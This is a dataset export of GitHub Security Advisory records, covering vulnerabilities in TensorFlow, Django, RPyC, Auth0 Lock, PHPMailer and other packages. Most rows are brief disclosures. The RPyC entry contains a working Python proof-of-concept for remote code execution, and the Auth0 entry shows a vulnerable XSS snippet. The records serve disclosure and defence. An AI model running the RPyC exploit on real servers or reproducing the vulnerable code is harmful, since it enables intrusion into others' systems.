ecosystem stringclasses 14 values | vuln_id stringlengths 10 19 | summary stringlengths 4 267 ⌀ | details stringlengths 9 13.5k | aliases stringlengths 17 144 ⌀ | modified_date stringdate 2010-05-27 05:47:00 2022-05-10 08:46:52 | published_date stringdate 2005-12-31 05:00:00 2022-05-10 08:46:50 | severity stringclasses 5 values | score float64 0 10 ⌀ | cwe_id stringclasses 988 values | refs stringlengths 30 17.7k ⌀ | introduced stringlengths 75 4.26k ⌀ |
|---|---|---|---|---|---|---|---|---|---|---|---|
GHSA | GHSA-crch-j389-5f84 | Heap OOB write in TFLite | ### Impact
A specially crafted TFLite model could trigger an OOB write on heap in the TFLite implementation of [`ArgMin`/`ArgMax`](https://github.com/tensorflow/tensorflow/blob/102b211d892f3abc14f845a72047809b39cc65ab/tensorflow/lite/kernels/arg_min_max.cc#L52-L59):
```cc
TfLiteIntArray* output_dims = TfLiteIntArrayCreate(NumDimensions(input) - 1);
int j = 0;
for (int i = 0; i < NumDimensions(input); ++i) {
if (i != axis_value) {
output_dims->data[j] = SizeOfDimension(input, i);
++j;
}
}
```
If `axis_value` is not a value between 0 and `NumDimensions(input)`, then the condition in the `if` is never true, so code writes past the last valid element of `output_dims->data`.
### Patches
We have patched the issue in GitHub commit [c59c37e7b2d563967da813fa50fe20b21f4da683](https://github.com/tensorflow/tensorflow/commit/c59c37e7b2d563967da813fa50fe20b21f4da683).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo 360. | {'CVE-2021-29603'} | 2021-05-21T14:28:15Z | 2021-05-21T14:28:15Z | LOW | 2.5 | {'CWE-787'} | {'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-crch-j389-5f84', 'https://github.com/advisories/GHSA-crch-j389-5f84', 'https://github.com/tensorflow/tensorflow/commit/c59c37e7b2d563967da813fa50fe20b21f4da683', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29603'} | null |
GHSA | GHSA-w267-m9c4-8555 | Shopware user session is not logged out if the password is reset via password recovery | ### Impact
User session is not logged out if the password is reset via password recovery
## Patches
Fixed in 6.4.8.1, maintainers recommend updating to the current version 6.4.8.2. You can get the update to 6.4.8.2 regularly via the Auto-Updater or directly via the download overview.
https://www.shopware.com/en/download/#shopware-6
## Workarounds
For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.
https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659 | {'CVE-2022-24744'} | 2022-03-18T20:13:01Z | 2022-03-10T17:37:43Z | LOW | 2.6 | {'CWE-613'} | {'https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-02-2022?category=security-updates', 'https://github.com/advisories/GHSA-w267-m9c4-8555', 'https://github.com/shopware/platform/security/advisories/GHSA-w267-m9c4-8555', 'https://nvd.nist.gov/vuln/detail/CVE-2022-24744'} | null |
GHSA | GHSA-jxwx-85vp-gvwm | Regular Expression Denial of Service in jquery-validation | The GitHub Security Lab team has identified potential security vulnerabilities in jquery.validation.
The project contains one or more regular expressions that are vulnerable to ReDoS (Regular Expression Denial of Service)
This issue was discovered and reported by GitHub team member @erik-krogh (Erik Krogh Kristensen). | {'CVE-2021-21252'} | 2022-04-19T19:02:41Z | 2021-01-13T18:21:54Z | MODERATE | 0 | {'CWE-400'} | {'https://www.npmjs.com/package/jquery-validation', 'https://github.com/jquery-validation/jquery-validation/commit/5d8f29eef363d043a8fec4eb86d42cadb5fa5f7d', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21252', 'https://security.netapp.com/advisory/ntap-20210219-0005/', 'https://github.com/jquery-validation/jquery-validation/pull/2371', 'https://github.com/jquery-validation/jquery-validation/security/advisories/GHSA-jxwx-85vp-gvwm', 'https://github.com/advisories/GHSA-jxwx-85vp-gvwm'} | null |
GHSA | GHSA-gv9j-4w24-q7vx | Improper random number generation in github.com/coredns/coredns | ### Impact
CoreDNS before 1.6.6 (using go DNS package < 1.1.25) improperly generates random numbers because math/rand is used. The TXID becomes predictable, leading to response forgeries.
### Patches
The problem has been fixed in 1.6.6+.
### References
- [CVE-2019-19794](https://nvd.nist.gov/vuln/detail/CVE-2019-19794)
### For more information
Please consult [our security guide](https://github.com/coredns/coredns/blob/master/.github/SECURITY.md) for more information regarding our security process.
| null | 2022-03-01T22:49:13Z | 2022-03-01T21:03:11Z | MODERATE | 0 | {'CWE-330'} | {'https://github.com/coredns/coredns/security/advisories/GHSA-gv9j-4w24-q7vx', 'https://github.com/advisories/GHSA-gv9j-4w24-q7vx'} | null |
GHSA | GHSA-246w-56m2-5899 | Cross-site scripting (XSS) vulnerability in the password reset endpoint | ### Impact
The password reset endpoint served via Synapse was vulnerable to cross-site scripting (XSS) attacks. The impact depends on the configuration of the domain that Synapse is deployed on, but may allow access to cookies and other browser data, CSRF vulnerabilities, and access to other resources served on the same domain or parent domains.
### Patches
This is fixed in #9200.
### Workarounds
Depending on the needs and configuration of the homeserver a few options are available:
1. Password resets can be disabled by delegating email to a third-party service (via the `account_threepid_delegates.email` setting) or disabling email (by not configuring the `email` setting).
2. If the homeserver is not configured to use passwords (via the `password_config.enabled` setting) then the affected endpoint can be blocked at a reverse proxy:
* `/_synapse/client/password_reset/email/submit_token`
3. The `password_reset_confirmation.html` template can be overridden with a custom template that manually escapes the variables using [JInja2's `escape` filter](https://jinja.palletsprojects.com/en/2.11.x/templates/#escape). See the `email.template_dir` setting. | {'CVE-2021-21332'} | 2021-08-31T21:07:24Z | 2021-03-26T19:52:54Z | MODERATE | 6.9 | {'CWE-79'} | {'https://github.com/matrix-org/synapse/security/advisories/GHSA-246w-56m2-5899', 'https://github.com/advisories/GHSA-246w-56m2-5899', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21332', 'https://github.com/matrix-org/synapse/releases/tag/v1.27.0', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNNAJOZNMVMXM6AS7RFFKB4QLUJ4IFEY/', 'https://github.com/matrix-org/synapse/pull/9200', 'https://github.com/matrix-org/synapse/commit/e54746bdf7d5c831eabe4dcea76a7626f1de73df'} | null |
GHSA | GHSA-qf7v-8hj3-4xw7 | Improper Verification of Cryptographic Signature in PySAML2 | PySAML2 before 5.0.0 does not check that the signature in a SAML document is enveloped and thus signature wrapping is effective, i.e., it is affected by XML Signature Wrapping (XSW). The signature information and the node/object that is signed can be in different places and thus the signature verification will succeed, but the wrong data will be used. This specifically affects the verification of assertion that have been signed. | {'CVE-2020-5390'} | 2021-08-25T21:05:17Z | 2020-05-06T19:41:29Z | HIGH | 7.5 | {'CWE-347'} | {'https://github.com/advisories/GHSA-qf7v-8hj3-4xw7', 'https://github.com/IdentityPython/pysaml2/releases', 'https://nvd.nist.gov/vuln/detail/CVE-2020-5390', 'https://pypi.org/project/pysaml2/5.0.0/', 'https://github.com/IdentityPython/pysaml2/commit/5e9d5acbcd8ae45c4e736ac521fd2df5b1c62e25', 'https://github.com/IdentityPython/pysaml2/blob/master/CHANGELOG.md#500-2020-01-13', 'https://github.com/IdentityPython/pysaml2/releases/tag/v5.0.0', 'https://usn.ubuntu.com/4245-1/', 'https://github.com/IdentityPython/pysaml2/commit/f27c7e7a7010f83380566a219fd6a290a00f2b6e', 'https://lists.debian.org/debian-lts-announce/2020/02/msg00025.html', 'https://www.debian.org/security/2020/dsa-4630'} | null |
GHSA | GHSA-9r8w-6x8c-6jr9 | Moderate severity vulnerability that affects django | In Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5, HTML autoescaping was disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allowed a cross-site scripting attack. This vulnerability shouldn't affect most production sites since you shouldn't run with "DEBUG = True" (which makes this page accessible) in your production settings. | {'CVE-2017-12794'} | 2021-09-08T20:55:04Z | 2019-01-04T17:50:34Z | MODERATE | 6.1 | {'CWE-79'} | {'https://www.djangoproject.com/weblog/2017/sep/05/security-releases/', 'https://github.com/advisories/GHSA-9r8w-6x8c-6jr9', 'http://www.securityfocus.com/bid/100643', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12794', 'http://www.securitytracker.com/id/1039264', 'https://usn.ubuntu.com/3559-1/'} | null |
GHSA | GHSA-r8j4-96mx-rjcc | Improper Restriction of XML External Entity Reference in skylot/jadx | skylot/jadx prior to 1.3.2 is vulnerable to Improper Restriction of XML External Entities when a user is tricked into exporting a malicious APK file (via the -e option) containing a crafted AndroidManifest.xml / strings.xml to gradle, leading to possible local file disclosure. | {'CVE-2022-0219'} | 2022-04-19T19:03:24Z | 2022-01-21T18:13:42Z | MODERATE | 5.5 | {'CWE-611'} | {'https://nvd.nist.gov/vuln/detail/CVE-2022-0219', 'https://github.com/skylot/jadx/commit/d22db30166e7cb369d72be41382bb63ac8b81c52', 'https://huntr.dev/bounties/0d093863-29e8-4dd7-a885-64f76d50bf5e', 'https://github.com/advisories/GHSA-r8j4-96mx-rjcc'} | null |
GHSA | GHSA-w2pf-g6r8-pg22 | Placeholder property does not indicate HTML capable, could lead to inadvertent abuse | ## Overview
Auth0 Lock version 11.20.4 and earlier did not properly sanitize the generated HTML code. Customers using the `additionalSignUpFields` customization option to add a checkbox to the sign-up dialog that are passing a `placeholder` property obtained from an untrusted source (e.g. a query parameter) could allow cross-site scripting (XSS) on their signup pages.
## Am I affected?
You are affected by this vulnerability if all of the following conditions apply:
- You are using Auth0 Lock version 11.20.4 or earlier.
- You pass `additionalSignUpFields` as options when initializing Lock which includes a field of type `checkbox` whose `placeholder` value is obtained from an untrusted source.
An example of a vulnerable snippet is the following where the `placeholder` value is partially user-controlled by the `name` query parameter:
```javascript
<script>
var params = new URLSearchParams(window.location.search);
var options = {
auth: {
redirectUrl: 'http://localhost:12345/callback',
responseType: 'code',
params: {
scope: 'openid email',
},
},
additionalSignUpFields: [{
name: 'agree',
type: 'checkbox',
placeholder: "I agree to Terms and Conditions for " + params.get('name'),
}],
};
var lock = new Auth0Lock('<CLIENT_ID>', '<TENANT_NAME>.auth0.com', options);
lock.show({
allowShowPassword: true,
initialScreen: 'signUp',
});
</script>
```
## How to fix that?
Developers using Auth0’s signin solution Lock need to upgrade to version 11.21.0 or later. Version 11.21.0 introduces two changes:
1. The existing `placeholder` property is now treated as plain text to mitigate the problem.
2. A new `placeholderHTML` property is introduced that indicates the level of control it provides and that it should be only supplied from trusted sources.
## Will this update impact my users?
This fix patches the Auth0 Lock widget and may require changes in application code, but it will not impact your users, their current state, or any existing sessions.
Developers using the `placeholder` property with HTML content from a trusted source should start using the `placeholderHTML` property to continue providing the same user experience. | {'CVE-2019-20174'} | 2021-08-19T16:48:59Z | 2020-01-31T17:59:51Z | MODERATE | 6.1 | {'CWE-79'} | {'https://nvd.nist.gov/vuln/detail/CVE-2019-20174', 'https://github.com/auth0/lock/commit/6c15e5659c21cd814ea119af5c51b61399598dd5', 'https://github.com/advisories/GHSA-w2pf-g6r8-pg22', 'https://auth0.com/docs/security/bulletins/cve-2019-20174', 'https://github.com/auth0/lock/releases/tag/v11.21.0', 'https://github.com/auth0/lock/security/advisories/GHSA-w2pf-g6r8-pg22'} | null |
GHSA | GHSA-rg4m-gww5-7p47 | Free of uninitialized memory in adtensor | An issue was discovered in the adtensor crate through 0.0.3 for Rust. There is a drop of uninitialized memory via the FromIterator implementation for Vector and Matrix. | {'CVE-2021-29936'} | 2021-08-25T20:54:18Z | 2021-08-25T20:54:18Z | CRITICAL | 9.8 | {'CWE-908'} | {'https://rustsec.org/advisories/RUSTSEC-2021-0045.html', 'https://github.com/advisories/GHSA-rg4m-gww5-7p47', 'https://github.com/charles-r-earp/adtensor/issues/4', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29936'} | null |
GHSA | GHSA-cg48-9hh2-x6mx | HTML Injection in preact | Versions of `preact` 10.x on prerelease tags alpha and beta prior to 10.0.0-beta.1 are vulnerable to HTML Injection. Due to insufficient input validation the package allows attackers to inject JavaScript objects as virtual-dom nodes, which may lead to Cross-Site Scripting. This requires user input parsed with `JSON.parse()` to be passed directly into JSX without sanitization.
## Recommendation
Upgrade to version 10.0.0-beta.1. | null | 2021-09-27T20:53:58Z | 2020-09-02T18:28:58Z | MODERATE | 0 | {'CWE-74'} | {'https://www.npmjs.com/advisories/835', 'https://github.com/developit/preact/releases/tag/10.0.0-beta.1', 'https://medium.com/dailyjs/exploiting-script-injection-flaws-in-reactjs-883fb1fe36c1', 'https://github.com/advisories/GHSA-cg48-9hh2-x6mx', 'https://github.com/developit/preact/pull/1528'} | null |
GHSA | GHSA-p72p-rjr2-r439 | Server-Side Request Forgery in terriajs-server | Versions of `terriajs-server`prior to 2.7.4 are vulnerable to Server-Side Request Forgery (SSRF). If an attacker has access to a server whitelisted by the terriajs-server proxy or if the attacker is able to modify the DNS records of a domain whitelisted by the terriajs-server proxy, the attacker can use the terriajs-server proxy to access any HTTP-accessible resources that are accessible to the server, including private resources in the hosting environment.
## Recommendation
Upgrade to version 2.7.4 or later. | null | 2021-08-04T20:07:20Z | 2019-05-29T20:24:02Z | HIGH | 0 | {'CWE-918'} | {'https://github.com/advisories/GHSA-p72p-rjr2-r439', 'https://github.com/TerriaJS/terriajs-server/commit/3cbc48475f50a53962f605491d0e60648a29bdf0', 'https://medium.com/terria/security-vulnerability-in-terriajs-server-82c8bf4da0a5', 'https://www.npmjs.com/advisories/768'} | null |
GHSA | GHSA-hwqf-gcqm-7353 | Header injection in nodemailer | The package nodemailer before 6.6.1 are vulnerable to HTTP Header Injection if unsanitized user input that may contain newlines and carriage returns is passed into an address object. | {'CVE-2021-23400'} | 2021-12-10T18:56:57Z | 2021-12-10T18:56:57Z | MODERATE | 6.3 | {'CWE-74'} | {'https://github.com/nodemailer/nodemailer/issues/1289', 'https://github.com/advisories/GHSA-hwqf-gcqm-7353', 'https://snyk.io/vuln/SNYK-JS-NODEMAILER-1296415', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23400', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1314737', 'https://github.com/nodemailer/nodemailer/commit/7e02648cc8cd863f5085bad3cd09087bccf84b9f'} | null |
GHSA | GHSA-76j4-gggq-7rg9 | SQLinjection in falcon-plus | Falcon-plus v0.3 was discovered to contain a SQL injection vulnerability via the parameter grpName in /config/service/host.go. | {'CVE-2022-26245'} | 2022-04-12T21:59:37Z | 2022-03-28T00:00:20Z | CRITICAL | 9.8 | {'CWE-89'} | {'https://github.com/advisories/GHSA-76j4-gggq-7rg9', 'https://nvd.nist.gov/vuln/detail/CVE-2022-26245', 'https://github.com/open-falcon/falcon-plus/issues/951'} | null |
GHSA | GHSA-pj4g-4488-wmxm | Dynamic modification of RPyC service due to missing security check | ### Impact
Version 4.1.0 of RPyC has a vulnerability that affects custom RPyC services making it susceptible to authenticated remote attacks.
### Patches
Git commits between September 2018 and October 2019 and version 4.1.0 are vulnerable. Use a version of RPyC that is not affected.
### Workarounds
The commit `d818ecc83a92548994db75a0e9c419c7bce680d6` could be used as a patch to add the missing access check.
### References
[CVE-2019-16328](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16328)
[RPyC Security Documentation](https://rpyc.readthedocs.io/en/latest/docs/security.html#security)
### For more information
If you have any questions or comments about this advisory:
* Open an issue using [GitHub](https://github.com/tomerfiliba-org/rpyc)
### Proof of Concept
```
import logging
import rpyc
import tempfile
from subprocess import Popen, PIPE
import unittest
PORT = 18861
SERVER_SCRIPT = f"""#!/usr/bin/env python
import rpyc
from rpyc.utils.server import ThreadedServer, ThreadPoolServer
from rpyc import SlaveService
import rpyc
class Foe(object):
foo = "bar"
class Fee(rpyc.Service):
exposed_Fie = Foe
def exposed_nop(self):
return
if __name__ == "__main__":
server = ThreadedServer(Fee, port={PORT}, auto_register=False)
thd = server.start()
"""
def setattr_orig(target, attrname, codeobj):
setattr(target, attrname, codeobj)
def myeval(self=None, cmd="__import__('sys')"):
return eval(cmd)
def get_code(obj_codetype, func, filename=None, name=None):
func_code = func.__code__
arg_names = ['co_argcount', 'co_posonlyargcount', 'co_kwonlyargcount', 'co_nlocals', 'co_stacksize', 'co_flags',
'co_code', 'co_consts', 'co_names', 'co_varnames', 'co_filename', 'co_name', 'co_firstlineno',
'co_lnotab', 'co_freevars', 'co_cellvars']
codetype_args = [getattr(func_code, n) for n in arg_names]
if filename:
codetype_args[arg_names.index('co_filename')] = filename
if name:
codetype_args[arg_names.index('co_name')] = name
mycode = obj_codetype(*codetype_args)
return mycode
def _vercmp_gt(ver1, ver2):
ver1_gt_ver2 = False
for i, v1 in enumerate(ver1):
v2 = ver2[i]
if v1 > v2:
ver1_gt_ver2 = True
break
elif v1 == v2:
continue
else: # v1 < v2
break
return ver1_gt_ver2
@unittest.skipIf(not _vercmp_gt(rpyc.__version__, (3, 4, 4)), "unaffected version")
class Test_InfoDisclosure_Service(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.logger = logging.getLogger('rpyc')
cls.logger.setLevel(logging.DEBUG) # NOTSET only traverses until another level is found, so DEBUG is preferred
cls.hscript = tempfile.NamedTemporaryFile()
cls.hscript.write(SERVER_SCRIPT.encode())
cls.hscript.flush()
while cls.hscript.file.tell() != len(SERVER_SCRIPT):
pass
cls.server = Popen(["python", cls.hscript.name], stdout=PIPE, stderr=PIPE, text=True)
cls.conn = rpyc.connect("localhost", PORT)
@classmethod
def tearDownClass(cls):
cls.conn.close()
cls.logger.info(cls.server.stdout.read())
cls.logger.info(cls.server.stderr.read())
cls.server.kill()
cls.hscript.close()
def netref_getattr(self, netref, attrname):
# PoC CWE-358: abuse __cmp__ function that was missing a security check
handler = rpyc.core.consts.HANDLE_CMP
return self.conn.sync_request(handler, netref, attrname, '__getattribute__')
def test_1_modify_nop(self):
# create netrefs for builtins and globals that will be used to construct on remote
remote_svc_proto = self.netref_getattr(self.conn.root, '_protocol')
remote_dispatch = self.netref_getattr(remote_svc_proto, '_dispatch_request')
remote_class_globals = self.netref_getattr(remote_dispatch, '__globals__')
remote_modules = self.netref_getattr(remote_class_globals['sys'], 'modules')
_builtins = remote_modules['builtins']
remote_builtins = {k: self.netref_getattr(_builtins, k) for k in dir(_builtins)}
# populate globals for CodeType calls on remote
remote_globals = remote_builtins['dict']()
for name, netref in remote_builtins.items():
remote_globals[name] = netref
for name, netref in self.netref_getattr(remote_modules, 'items')():
remote_globals[name] = netref
# create netrefs for types to create remote function malicously
remote_types = remote_builtins['__import__']("types")
remote_types_CodeType = self.netref_getattr(remote_types, 'CodeType')
remote_types_FunctionType = self.netref_getattr(remote_types, 'FunctionType')
# remote eval function constructed
remote_eval_codeobj = get_code(remote_types_CodeType, myeval, filename='test_code.py', name='__code__')
remote_eval = remote_types_FunctionType(remote_eval_codeobj, remote_globals)
# PoC CWE-913: modify the exposed_nop of service
# by binding various netrefs in this execution frame, they are cached in
# the remote address space. setattr and eval functions are cached for the life
# of the netrefs in the frame. A consequence of Netref classes inheriting
# BaseNetref, each object is cached under_local_objects. So, we are able
# to construct arbitrary code using types and builtins.
# use the builtin netrefs to modify the service to use the constructed eval func
remote_setattr = remote_builtins['setattr']
remote_type = remote_builtins['type']
remote_setattr(remote_type(self.conn.root), 'exposed_nop', remote_eval)
# show that nop was replaced by eval to complete the PoC
remote_sys = self.conn.root.nop('__import__("sys")')
remote_stack = self.conn.root.nop('"".join(__import__("traceback").format_stack())')
self.assertEqual(type(remote_sys).__name__, 'builtins.module')
self.assertIsInstance(remote_sys, rpyc.core.netref.BaseNetref)
self.assertIn('rpyc/utils/server.py', remote_stack)
def test_2_new_conn_impacted(self):
# demostrate impact and scope of vuln for new connections
self.conn.close()
self.conn = rpyc.connect("localhost", PORT)
# show new conn can still use nop as eval
remote_sys = self.conn.root.nop('__import__("sys")')
remote_stack = self.conn.root.nop('"".join(__import__("traceback").format_stack())')
self.assertEqual(type(remote_sys).__name__, 'builtins.module')
self.assertIsInstance(remote_sys, rpyc.core.netref.BaseNetref)
self.assertIn('rpyc/utils/server.py', remote_stack)
if __name__ == "__main__":
unittest.main()
``` | {'CVE-2019-16328'} | 2022-04-19T19:02:47Z | 2021-02-17T19:50:58Z | HIGH | 8.5 | {'CWE-285'} | {'https://github.com/advisories/GHSA-pj4g-4488-wmxm', 'https://github.com/tomerfiliba-org/rpyc/security/advisories/GHSA-pj4g-4488-wmxm'} | null |
GHSA | GHSA-v6rh-hp5x-86rv | Potential bypass of an upstream access control based on URL paths in Django | In Django 2.2 before 2.2.25, 3.1 before 3.1.14, and 3.2 before 3.2.10, HTTP requests for URLs with trailing newlines could bypass upstream access control based on URL paths. This issue has low severity, according to the Django security policy. | {'CVE-2021-44420'} | 2022-02-14T22:20:29Z | 2021-12-09T19:09:37Z | HIGH | 7.3 | {'CWE-287'} | {'https://github.com/django/django/commit/d4dcd5b9dd9e462fec8220e33e3e6c822b7e88a6', 'https://docs.djangoproject.com/en/3.2/releases/security/', 'https://security.netapp.com/advisory/ntap-20211229-0006/', 'https://nvd.nist.gov/vuln/detail/CVE-2021-44420', 'https://github.com/advisories/GHSA-v6rh-hp5x-86rv', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B4SQG2EAF4WCI2SLRL6XRDJ3RPK3ZRDV/', 'https://www.djangoproject.com/weblog/2021/dec/07/security-releases/', 'https://groups.google.com/forum/#!forum/django-announce', 'https://www.openwall.com/lists/oss-security/2021/12/07/1'} | null |
GHSA | GHSA-hx3r-jv9q-85jw | Bitcoin Inventory Out-of-Memory Denial-of-Service Attack (CVE-2018-17145) | There was an easily exploitable uncontrolled memory resource consumption denial-of-service vulnerability that existed in the peer-to-peer network code of three implementations of Bitcoin and several alternative chains.
For more details please see:
https://invdos.net/
For the paper:
https://invdos.net/paper/CVE-2018-17145.pdf | {'CVE-2018-17145'} | 2021-10-04T21:16:22Z | 2020-09-10T19:44:58Z | HIGH | 7.5 | {'CWE-400'} | {'https://nvd.nist.gov/vuln/detail/CVE-2018-17145', 'https://en.bitcoin.it/wiki/Common_Vulnerabilities_and_Exposures#CVE-2018-17145', 'https://invdos.net', 'https://invdos.net/paper/CVE-2018-17145.pdf', 'https://github.com/advisories/GHSA-hx3r-jv9q-85jw', 'https://github.com/bitcoin/bitcoin/blob/v0.16.2/doc/release-notes.md', 'https://github.com/bcoin-org/bcoin/security/advisories/GHSA-hx3r-jv9q-85jw'} | null |
GHSA | GHSA-f884-gm86-cg3q | PrestaShop module ps_facetedsearch might be vulnerable from CVE-2017-9841 | ### Impact
We have identified that some ps_facetedsearch module ZIP archives have been built with phpunit dev dependencies. PHPUnit contains a php script that would allow, on a webserver, an attacker to perform a RCE.
This vulnerability impacts
- phpunit before 4.8.28 and 5.x before 5.6.3 as reported in [CVE-2017-9841](https://nvd.nist.gov/vuln/detail/CVE-2017-9841)
- phpunit >= 5.63 before 7.5.19 and 8.5.1 (this is a newly found vulnerability that is currently being submitted as a CVE after disclosure was provided to phpunit maintainers)
### Patches
In the [security patch](https://github.com/PrestaShop/ps_facetedsearch/releases/tag/v3.4.1), we look for the unwanted vendor/phpunit folder and remove it if we find it. This allows users to fix the security issue when upgrading.
### Workarounds
Users can also simply remove the unwanted vendor/phpunit folder.
### References
https://nvd.nist.gov/vuln/detail/CVE-2017-9841
### For more information
If you have any questions or comments about this advisory, email us at security@prestashop.com | null | 2020-01-07T17:20:47Z | 2020-01-07T17:20:47Z | HIGH | 0 | null | {'https://github.com/PrestaShop/ps_facetedsearch/commit/47c4785a21ee3b1734b2d46f044f9659a151feca', 'https://github.com/advisories/GHSA-f884-gm86-cg3q', 'https://github.com/PrestaShop/ps_facetedsearch/security/advisories/GHSA-f884-gm86-cg3q'} | null |
GHSA | GHSA-7r79-mrp6-8mhq | Rate limit missing in microweber | Microweber prior to version 1.3 does not rate limit password reset emails. | {'CVE-2022-0777'} | 2022-03-10T16:00:57Z | 2022-03-02T00:00:19Z | HIGH | 7.5 | {'CWE-640'} | {'https://huntr.dev/bounties/b36be8cd-544f-42bd-990d-aa1a46df44d7', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0777', 'https://github.com/microweber/microweber/commit/a3944cf9d1d8c41a48297ddc98302934e2511b0f', 'https://github.com/advisories/GHSA-7r79-mrp6-8mhq'} | null |
GHSA | GHSA-6xwr-q98w-rvg7 | Prototype Pollution in nconf | nconf before 0.11.4. When using the memory engine, it is possible to store a nested JSON representation of the configuration. The .set() function, that is responsible for setting the configuration properties, is vulnerable to Prototype Pollution. By providing a crafted property, it is possible to modify the properties on the Object.prototype. | {'CVE-2022-21803'} | 2022-04-22T20:32:07Z | 2022-04-13T00:00:30Z | HIGH | 7.3 | {'CWE-1321'} | {'https://github.com/indexzero/nconf/releases/tag/v0.11.4', 'https://nvd.nist.gov/vuln/detail/CVE-2022-21803', 'https://github.com/advisories/GHSA-6xwr-q98w-rvg7', 'https://github.com/indexzero/nconf/pull/397', 'https://snyk.io/vuln/SNYK-JS-NCONF-2395478'} | null |
GHSA | GHSA-fvc6-qjp7-m4g4 | Arbitrary file upload in Ghost | An arbitrary file upload vulnerability in the file upload module of Ghost v4.39.0 allows attackers to execute arbitrary code via a crafted SVG file. | {'CVE-2022-27139'} | 2022-04-22T20:29:43Z | 2022-04-13T00:00:24Z | CRITICAL | 9.8 | {'CWE-434'} | {'https://nvd.nist.gov/vuln/detail/CVE-2022-27139', 'https://youtu.be/FCqWEvir2wE', 'https://github.com/advisories/GHSA-fvc6-qjp7-m4g4'} | null |
GHSA | GHSA-r3j7-x2g5-9gx6 | Command injection in samba-client | The samba-client package before 4.0.0 for Node.js allows command injection because of the use of process.exec. | {'CVE-2021-27185'} | 2022-05-03T03:44:39Z | 2021-02-11T20:47:27Z | CRITICAL | 9.8 | {'CWE-74', 'CWE-78', 'CWE-77'} | {'https://github.com/eflexsystems/node-samba-client/releases/tag/4.0.0', 'https://github.com/eflexsystems/node-samba-client/commit/5bc3bbad9b8d02243bc861a11ec73f788fbb1235', 'https://nvd.nist.gov/vuln/detail/CVE-2021-27185', 'https://github.com/advisories/GHSA-r3j7-x2g5-9gx6', 'https://security.netapp.com/advisory/ntap-20210319-0002/', 'https://advisory.checkmarx.net/advisory/CX-2021-4302', 'https://www.npmjs.com/package/samba-client'} | null |
GHSA | GHSA-4pc3-96mx-wwc8 | Remote code execution in PHPMailer | ### Impact
The `isMail` transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the `mail` command and consequently execute arbitrary code by leveraging improper interaction between the `escapeshellarg` function and internal escaping performed in the mail function in PHP. NOTE: this vulnerability exists because of an incorrect fix for CVE-2016-10033.
This issue really emphasises that it's worth avoiding the built-in PHP `mail()` function entirely.
### Patches
Fixed in 5.2.20
### Workarounds
Send via SMTP to localhost instead of calling the `mail()` function.
### References
https://nvd.nist.gov/vuln/detail/CVE-2016-10045
See also https://nvd.nist.gov/vuln/detail/CVE-2016-10033
### For more information
If you have any questions or comments about this advisory:
* Open a private issue in [the PHPMailer project](https://github.com/PHPMailer/PHPMailer) | {'CVE-2016-10045'} | 2021-08-19T19:43:37Z | 2020-03-05T22:09:14Z | CRITICAL | 9.8 | {'CWE-77'} | {'https://nvd.nist.gov/vuln/detail/CVE-2016-10045', 'http://www.securityfocus.com/bid/95130', 'http://www.rapid7.com/db/modules/exploit/multi/http/phpmailer_arg_injection', 'http://openwall.com/lists/oss-security/2016/12/28/1', 'http://packetstormsecurity.com/files/140286/PHPMailer-Remote-Code-Execution.html', 'https://www.exploit-db.com/exploits/40969/', 'http://www.securitytracker.com/id/1037533', 'https://github.com/advisories/GHSA-4pc3-96mx-wwc8', 'https://www.exploit-db.com/exploits/42221/', 'https://github.com/PHPMailer/PHPMailer/releases/tag/v5.2.20', 'https://github.com/PHPMailer/PHPMailer/security/advisories/GHSA-4pc3-96mx-wwc8', 'https://developer.joomla.org/security-centre/668-20161205-phpmailer-security-advisory.html', 'https://github.com/PHPMailer/PHPMailer/wiki/About-the-CVE-2016-10033-and-CVE-2016-10045-vulnerabilities', 'http://seclists.org/fulldisclosure/2016/Dec/81', 'https://www.exploit-db.com/exploits/40986/', 'https://github.com/FriendsOfPHP/security-advisories/blob/master/phpmailer/phpmailer/CVE-2016-10045.yaml', 'http://www.securityfocus.com/archive/1/539967/100/0/threaded', 'https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html', 'http://packetstormsecurity.com/files/140350/PHPMailer-Sendmail-Argument-Injection.html'} | null |
GHSA | GHSA-cpcr-74q9-74gp | Broken Authentication in Atlassian Connect Spring Boot | Broken Authentication in Atlassian Connect Spring Boot (ACSB) from version 1.1.0 before version 2.1.3. Atlassian Connect Spring Boot is a Java Spring Boot package for building Atlassian Connect apps. Authentication between Atlassian products and the Atlassian Connect Spring Boot app occurs with a server-to-server JWT or a context JWT. Atlassian Connect Spring Boot versions between 1.1.0 - 2.1.2 erroneously accept context JWTs in lifecycle endpoints (such as installation) where only server-to-server JWTs should be accepted, permitting an attacker to send authenticated re-installation events to an app. | {'CVE-2021-26074'} | 2022-03-02T21:02:01Z | 2021-05-10T15:19:04Z | MODERATE | 6.5 | {'CWE-287', 'CWE-863'} | {'https://community.developer.atlassian.com/t/action-required-atlassian-connect-vulnerability-allows-bypass-of-app-qsh-verification-via-context-jwts/47072', 'https://nvd.nist.gov/vuln/detail/CVE-2021-26074', 'https://github.com/advisories/GHSA-cpcr-74q9-74gp', 